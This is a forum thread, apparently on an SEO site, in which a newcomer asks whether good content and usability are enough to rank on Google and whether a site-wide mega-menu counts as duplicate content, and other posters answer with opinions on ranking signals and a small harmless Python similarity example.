Does Google play fair? Is 'relevant content' and 'usability' enough?
-
It seems there are two opposing views, and as a newbie I find this very confusing.
One view is that as long as your site pages have relevant content and are easy for the user, Google will rank you fairly.
The other view is that Google has 'rules' you must follow, and even if the site is relevant and user-friendly, your site may never rank well if you don't play by the rules.
Which is closer to the truth? No one wants a great website that won't rank simply because Google isn't sophisticated enough to recognize that the site is playing fair.
Here's an example to illustrate one related concern I have:
I've read that Google doesn't like duplicated content. But here are two cases in which it is more 'relevant' and 'usable' for the user to have duplicate content:
Say a website helps you find restaurants in a city. Restaurants may be listed by city region and by type of restaurant. The home page may have links to 30 city regions. It may also have links for 20 types of restaurants. The user has a choice.

Say the user chooses a region. The resulting page may still be relevant and usable by listing ALL 30 regions, because the user may want to choose a different region. Alternatively, say the user chooses a restaurant type for the whole city. The resulting page may still be relevant and usable by giving the user the ability to choose another type OR another city region. In other words, there may be a 'mega-menu' at the top of the page that is duplicated on every page of the site but is very helpful: instead of requiring the user to go back to the home page to click a new region or a new type, the user can do it on any page.

That's duplicate content in the form of a mega menu, but it is very relevant and usable. YET, my sense is that Google MAY penalize the site, even though this is arguably the most relevant and usable approach for someone who may or may not have a specific region or restaurant type in mind.
Thoughts?
-
Hi David,
Sorry for such a delayed response, but I keep wondering about your point on the meganav. Is it known that Google is able to figure out menus and won't count those toward duplicate content? I just would like to be sure, since my menus are fairly substantial when dropdowns are included.
-
You are giving me SOME hope for a site I've been working on for about 5 years and am getting ready to launch. Thanks very much.
-
Your comment in #4 about time on page and bookmarking is something I think should be taken into account by Google for search page ranking, but I've never heard before that they do. [...] Are those significant factors used by Google?
In my opinion, Google has every ability to measure visitor actions. They own the Chrome browser and could measure the engagement of visitors with a page; they have access to what gets bookmarked in Chrome; they know when a visitor clicks in the SERPs and when that same visitor reappears in the SERPs; they don't have to rely on links because they can read when people mention your site in a forum; they know if people navigate to your site by typing its name into search... I believe that all of these things are important for rankings, but how important I can't say.
I have lots of really good content that ranked at #150 or deeper in the SERPs when I first published it. Then, with zero links built and zero promotion, each page slowly rises in the SERPs; one is now in the top three - over a year later. I have hundreds of pages that have done that. You gotta have a LOT of patience to do things that way, but you spend zero effort on promotion and 100% effort producing assets for your website. That is what I have done since about 2006. Virtually zero link building. My visitors are my link builders.
-
EGOL, thanks very much. Being a one-person business, I am very interested in the idea of ranking by popularity, as my goal is to have the best site out there but I have limited funds to promote it. Your comment in #4 about time on page and bookmarking is something I think should be taken into account by Google for search page ranking, but I've never heard before that they do. After all, usage and return usage is what it is all about! Are those significant factors used by Google? If so, maybe there is hope. :)
-
Egol has this summed up perfectly!
-Andy
-
One view is that as long as your site pages have relevant content and are easy for the user, Google will rank you fairly.
The other view is that Google has 'rules' you must follow, and even if the site is relevant and user-friendly, your site may never rank well if you don't play by the rules.
Which is closer to the truth?
They are both a small piece of the truth. To rank on Google, your PAGE must:
1. Be relevant to the search term and presented to Google with a proper title, crawlability, and text visibility.
2. Have substantive content about the search term.
3. Be validated by other websites, by being linked from them or mentioned by them (these are just a few validations).
4. Be validated by visitors, because they have queried it by name, stayed on it, bookmarked it, or mentioned it by name in web-readable content (these are just a few validations).
Any idiot can do #1. A good author can do #2. But #3 and #4 are really difficult to accomplish by people who are not related to you or paid by you.
In low competition, #1 and #2 can be enough to get you ranked. The higher the competition for a query, the more you need #3 and #4 to rank. For some queries it can be almost impossible for a newcomer to rank on the first page of Google without investing $xxx,xxx or more in website assets and promotion... AND... having a plan in place to present the site in a way that Google will be able to read and interpret so as to maximize the #3 and #4 assets.
-
-
A meganav is not considered duplicate content. Duplicate content means things like identical product description pages, the same article appearing in multiple places on your site, etc.
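A toy way to see the distinction: duplicate-content checks care about the text that remains after shared boilerplate, like a site-wide menu, is stripped out. Here is a minimal sketch of that idea (purely illustrative - this is not Google's actual algorithm, and the menu and page text are made-up examples):

```python
# Illustrative only: compare two pages' similarity with and without
# a shared, site-wide mega-menu. The point: once boilerplate is
# removed, the pages' unique content is clearly different.
from difflib import SequenceMatcher

# Hypothetical mega-menu repeated on every page of the site.
MENU = "Home | Regions | Restaurant Types | Contact"

def main_content_similarity(page_a: str, page_b: str, boilerplate: str) -> float:
    """Similarity of two pages after stripping shared boilerplate."""
    a = page_a.replace(boilerplate, "").strip()
    b = page_b.replace(boilerplate, "").strip()
    return SequenceMatcher(None, a, b).ratio()

page_region = MENU + "\nItalian restaurants in the North End, with reviews and hours."
page_type = MENU + "\nSushi bars across the whole city, sorted by rating."

raw = SequenceMatcher(None, page_region, page_type).ratio()
stripped = main_content_similarity(page_region, page_type, MENU)

# The raw pages look similar mainly because of the shared menu;
# with the menu removed, the similarity drops.
print(raw > stripped)
```

The shared menu inflates the raw similarity score; a crawler that recognizes navigation as boilerplate would judge the two pages on their unique content instead, which is why a repeated mega-menu is not the same problem as duplicated articles.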
To the main parts of your question - Google does not want it to be easy for people in the SEO world. They give guidelines, but following them guarantees nothing. What Google considers an OK tactic one year becomes an unacceptable tactic the next (see guest blogging). There are many ways to succeed in ranking. Some follow Google's rules and wait for rankings to come; others use tons of spammy tactics and rank instantly (though they always risk losing it overnight if Google catches on).
The idea that an easy-to-use site and relevant content will make Google rank you fairly is a joke. And though only one person has said it publicly, there are many top minds in the SEO world who will tell you that in private.